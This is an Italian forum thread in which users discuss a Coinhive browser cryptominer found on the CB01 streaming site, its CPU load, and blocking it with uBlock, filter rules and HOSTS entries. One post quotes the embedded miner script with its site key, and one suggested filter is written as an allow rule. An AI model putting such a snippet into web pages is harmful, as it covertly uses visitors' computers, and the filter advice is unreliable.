Coin Miner nascosto in CB01 e altri

Pubblicità
Stato
Discussione chiusa ad ulteriori risposte.
Adblock non lo blocca. Ublock a quanto pare sì.
Se tutto va bene domani esce un articolo a riguardo.
anche su adblock funziona, il filtro da inserire è
Codice:
@@|coin-hive.com

edit: oggi non funziona, ma la cpu sta intorno all'80% invece del 100%
 
Secondo me se venisse usata in maniera intelligente potrebbe essere una funzione utile.
Mi immagino un Tom's senza pubblicita' ma con un miner che lavora moderatamente (quindi senza mandare a palla tutti i core). Personalmente preferirei "pagare con cicli di clock" piuttosto che con pubblicita' invasive e fastidiose. Chissa' se (e quanto) rende questo sistema.
 
Ne discutemmo già sul gruppo con @Yoshi91 diversi giorni fa. Come soluzione propongo quella di inserire semplicemente una corrispondenza ip locale - url di coin-hive nel file HOSTS.TXT di Windows. Ricordatevi di pulire la cache del browser (molto importante poiché il JS fetchato da coin-hive resta cachato) e di riavviare il PC.
2pxw6dn.jpg
PS. Le prime due righe aggiuntive sono inutili, basta inserire l'ultima riga senza # davanti.
PPS. Pare sia stato rimosso dal sito che ho oscurato ma al momento dello screenshot lo script era presente e funzionante e solitamente si presenta in questa maniera:
Codice:
 <![CDATA[
  var miner = new CoinHive.Anonymous('ByIELr4u4a9ZaleKDOEumwam291ELdod');
  miner.start(); ]]
2201f38e-f565-4b3c-b5e8-cce3b508c69c
 
Ultima modifica:
E' giusto fare cosi tanta pubblicità ad un sito che condivide link che rimandano a materiale protetto da copyright?
che oltre ad essere lesivo per i detentori dei diritti ora è lesivo anche per gli utenti....
Al momento gli amministratori del portale ad avere un ritorno economico col minning, gli AD e via dicendo.. ora ne hanno anche uno di immagine, seppur negativo..
 
è possibile, da un punto di vista tecnico, fare la stessa cosa con video in diretta su facebook? ho notato che mentre guardavo una diretta lì il PC era diventato estremamente lento, ma non ho controllato CPU e processi sul momento (cosa che farò nel caso ricapitasse).
 
è possibile, da un punto di vista tecnico, fare la stessa cosa con video in diretta su facebook? ho notato che mentre guardavo una diretta lì il PC era diventato estremamente lento, ma non ho controllato CPU e processi sul momento (cosa che farò nel caso ricapitasse).
No, per funzionare deve essere integrato nella pagina che stai visitando (o eventualmente un malware). Dubito che Facebook inserisca miner js nelle proprie pagine, fanno gia' di peggio e non hanno bisogno di criptovalute :)
 
ok, allora non mi spiego perché quella pagina, e quella solo, mi impallasse il portatile (che scrausissimo non è 6700HQ+16GB RAM+965M)
 
Confermo che con ublock il problema non c'è, provato sia su edge che su chrome. Invece con explorer (si, è ancora installato xd) la cpu schizza subito al 75-80%, ma stranamente non supera mai quella percentuale...
 
Interessantissimo , mi ero perso questo thread (non citato da @LordNight , ma giustamente non può taggare tutti :D).

Insomma , a quanto pare alcuni siti hanno trovato un altra fonte alternativa di guadagno allora......

Cmq , lo fa subito o dopo qualche minuto ? Ho provato ad andare sul sito incriminato sia con Opera che con Edge ma non ho notato nulla di anomalo dal gestore attività...... Hanno già rimosso?
 
A me fino all'altro ieri lo faceva selezionando un film (anche senza far partire lo streaming), non nella home. Ma poi non ho più provato
 
......Cmq , lo fa subito o dopo qualche minuto ? Ho provato ad andare sul sito incriminato sia con Opera che con Edge ma non ho notato nulla di anomalo dal gestore attività...... Hanno già rimosso?

Mi associo al messaggio di Jarren. Anche a me sembra non attivarsi questo script: ho provato ad accedere al sito in questione (Windows 10 con Edge, senza nessuna estensione anti-ad) ma non noto attività insolite... :deserto:
Questo miner è ancora attivo, o è già stato tolto?
 
Stato
Discussione chiusa ad ulteriori risposte.
Pubblicità
Pubblicità
Indietro
Top